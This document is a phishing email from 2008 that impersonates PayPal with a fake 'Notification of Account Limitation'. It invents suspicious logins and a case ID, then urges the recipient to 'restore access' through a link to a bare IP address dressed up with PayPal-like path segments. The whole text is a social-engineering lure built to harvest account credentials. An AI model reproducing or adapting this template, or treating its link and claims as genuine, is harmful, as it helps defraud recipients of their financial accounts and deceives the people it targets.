Subject: PayPal - Notification of Account Limitation

From: "PayPal"<[email-masked]>
Date: Sat, 29 Mar 2008 12:23:16 -0700

Dear PayPal account holder,

	PayPal is constantly working to ensure security by regularly screening the accounts in our system. We have
 recently determined that different computers have tried logging into your PayPal account,and multiple password
 failures were present before the logons. Until we can collect secure information, your access to sensitive account
 features will be limited. We would like to restore your access as soon as possible, and we apologize for the
 inconvenience. 

--------------------------------------------------------------------------------
	Why is my account access limited?

	Your account access has been limited for the following reason(s):

 March 27, 2008: We have reasons to believe that your account has been accessed by a third party. We have
 limited access to sensitive PayPal account features in case your account has been accessed by an unauthorized
 third party. We understand that having limited access can be an inconvenience, but protecting your account is
 our primary concern. 

(Your case ID for this reason is PP-467-13498-031.)

--------------------------------------------------------------------------------
	How can I restore my account access?

	Please visit the Resolution Center and complete the "Steps to Remove Limitations."
	To visit the Resolution Center, please follow the link below:

	http://203.79.0.6/security/www.paypal.com/www.paypal.com/cgi-bin/webscr=cmd=p/index.php

	Completing all of the checklist items will automatically restore your account access.
	Please do not reply to this e-mail. Mail sent to this address cannot be answered. 

				© Copyright © 1999-2008 PayPal. All rights reserved.